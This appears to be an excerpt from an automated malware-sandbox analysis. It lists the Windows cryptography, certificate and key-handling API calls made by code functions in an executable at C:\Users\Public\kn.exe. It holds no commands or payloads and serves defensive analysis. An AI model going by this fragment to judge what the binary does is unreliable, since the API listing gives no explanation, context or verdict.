Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD84D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,7_2_00007FF7FD84D6A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8336E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF7FD8336E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,7_2_00007FF7FD81F6D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BF630 CryptAcquireContextW,GetLastError,#357,SetLastError,7_2_00007FF7FD7BF630
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85F650 CryptHashCertificate2,SetLastError,7_2_00007FF7FD85F650
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD833654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF7FD833654
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD82F644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD82F644
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BD660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF7FD7BD660
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A5664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,7_2_00007FF7FD7A5664
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD80366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,7_2_00007FF7FD80366C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,7_2_00007FF7FD81B664
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD859688 CryptFindOIDInfo,#357,#360,#360,#360,7_2_00007FF7FD859688
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BD5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7BD5C2
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F55F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,7_2_00007FF7FD7F55F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8195FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,7_2_00007FF7FD8195FC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7FB55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,7_2_00007FF7FD7FB55C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85F570 CryptHashCertificate,SetLastError,7_2_00007FF7FD85F570
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD833590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF7FD833590
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD869580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,7_2_00007FF7FD869580
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8698B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF7FD8698B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81B8D0 I_CryptGetLruEntryData,#357,7_2_00007FF7FD81B8D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8018DC CertFindExtension,CryptDecodeObject,GetLastError,#357,7_2_00007FF7FD8018DC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A38FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF7FD7A38FC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD82184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF7FD82184C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,7_2_00007FF7FD81D850
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD833860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF7FD833860
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C7884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,7_2_00007FF7FD7C7884
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD809878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,7_2_00007FF7FD809878
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8337A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF7FD8337A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D17D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,7_2_00007FF7FD7D17D4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8497E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,7_2_00007FF7FD8497E4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,7_2_00007FF7FD81B808
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,7_2_00007FF7FD85F7FC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7CF810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF7FD7CF810
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,7_2_00007FF7FD85D750
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD835768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD835768
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7FF774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,7_2_00007FF7FD7FF774
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD84B794 CryptExportPublicKeyInfoEx,SetLastError,7_2_00007FF7FD84B794
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD80577C #360,#358,CryptDecodeObject,GetLastError,#357,7_2_00007FF7FD80577C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7CD790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,7_2_00007FF7FD7CD790
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7AB788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,7_2_00007FF7FD7AB788
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8332A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF7FD8332A8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7FB2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,7_2_00007FF7FD7FB2B4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F92C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,7_2_00007FF7FD7F92C4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8132D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF7FD8132D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD82F2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD82F2F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8092D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,7_2_00007FF7FD8092D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7CD304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7CD304
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,7_2_00007FF7FD81D30C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7CD240 #357,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF7FD7CD240
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85D28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,7_2_00007FF7FD85D28C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD867290 NCryptIsKeyHandle,#359,#360,#357,#358,7_2_00007FF7FD867290
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8051A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD8051A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8311C8 NCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF7FD8311C8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8671C8 BCryptDestroyKey,#360,7_2_00007FF7FD8671C8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8331C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF7FD8331C0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD867214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,7_2_00007FF7FD867214
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD889208 #357,NCryptEnumKeys,#360,#358,7_2_00007FF7FD889208
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF7FD85511C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7E9134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,7_2_00007FF7FD7E9134
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD867124 BCryptGenerateKeyPair,#360,7_2_00007FF7FD867124
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81F168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,7_2_00007FF7FD81F168
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD815164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF7FD815164
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD813188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,7_2_00007FF7FD813188
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD867178 BCryptCloseAlgorithmProvider,#360,7_2_00007FF7FD867178
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85F4A0 CryptHashPublicKeyInfo,SetLastError,7_2_00007FF7FD85F4A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD84B4EC CryptDecodeObjectEx,SetLastError,7_2_00007FF7FD84B4EC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8614F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,7_2_00007FF7FD8614F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F3504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,7_2_00007FF7FD7F3504
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8334F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF7FD8334F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD83342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF7FD83342C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF7FD86141C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD795438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF7FD795438
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD84B464 CryptEncodeObjectEx,SetLastError,7_2_00007FF7FD84B464
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81F488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,7_2_00007FF7FD81F488
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD839480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD839480
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8433B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,7_2_00007FF7FD8433B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,7_2_00007FF7FD86739C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8133A0 CryptVerifyCertificateSignature,CertCompareCertificateName,7_2_00007FF7FD8133A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8693A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF7FD8693A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8153E8 CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF7FD8153E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF7FD81B3D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F13F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,7_2_00007FF7FD7F13F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7CB324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,7_2_00007FF7FD7CB324
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C7340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,7_2_00007FF7FD7C7340
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F5338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF7FD7F5338
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7EB350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,7_2_00007FF7FD7EB350
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BB36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,7_2_00007FF7FD7BB36C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD833390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF7FD833390
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD866EA8 NCryptImportKey,#360,7_2_00007FF7FD866EA8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD890ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,7_2_00007FF7FD890ED0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD830EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF7FD830EF4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C0E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7C0E24
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD866E48 NCryptSetProperty,#360,7_2_00007FF7FD866E48
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD832E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,7_2_00007FF7FD832E6C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD874E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,7_2_00007FF7FD874E58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85EE94 CryptSignMessage,SetLastError,7_2_00007FF7FD85EE94
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD802E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF7FD802E7C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D0E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,7_2_00007FF7FD7D0E94
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD862DAC #357,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF7FD862DAC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD858DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,7_2_00007FF7FD858DD0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD830DD4 NCryptGetProperty,#205,#359,#357,#359,#357,7_2_00007FF7FD830DD4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD880DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,7_2_00007FF7FD880DB8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD814DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF7FD814DDC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD866DE0 NCryptCreatePersistedKey,#360,7_2_00007FF7FD866DE0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD866D2C NCryptFreeBuffer,#360,7_2_00007FF7FD866D2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F2D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF7FD7F2D18
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD832D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF7FD832D78
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD866D78 NCryptOpenKey,#360,7_2_00007FF7FD866D78
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD830D84 NCryptFreeObject,#205,#357,7_2_00007FF7FD830D84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7FB098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,7_2_00007FF7FD7FB098
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD83B0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD83B0A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8670C8 BCryptSetProperty,#360,7_2_00007FF7FD8670C8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8310D8 NCryptSetProperty,#205,#359,#357,#359,#357,7_2_00007FF7FD8310D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8330D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF7FD8330D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD829028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,7_2_00007FF7FD829028
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF7FD7A302F
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A7034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,7_2_00007FF7FD7A7034
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD83301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF7FD83301C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD837020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD837020
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86705C BCryptGetProperty,#360,7_2_00007FF7FD86705C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD831058 NCryptOpenStorageProvider,#205,#359,#357,7_2_00007FF7FD831058
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,7_2_00007FF7FD7D107C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD866FAC BCryptOpenAlgorithmProvider,#360,7_2_00007FF7FD866FAC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD830FB4 NCryptOpenKey,#205,#359,#357,#357,7_2_00007FF7FD830FB4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86700C BCryptEnumAlgorithms,#360,7_2_00007FF7FD86700C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD866F2C NCryptExportKey,#360,7_2_00007FF7FD866F2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C8F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,7_2_00007FF7FD7C8F1C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD814F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF7FD814F50
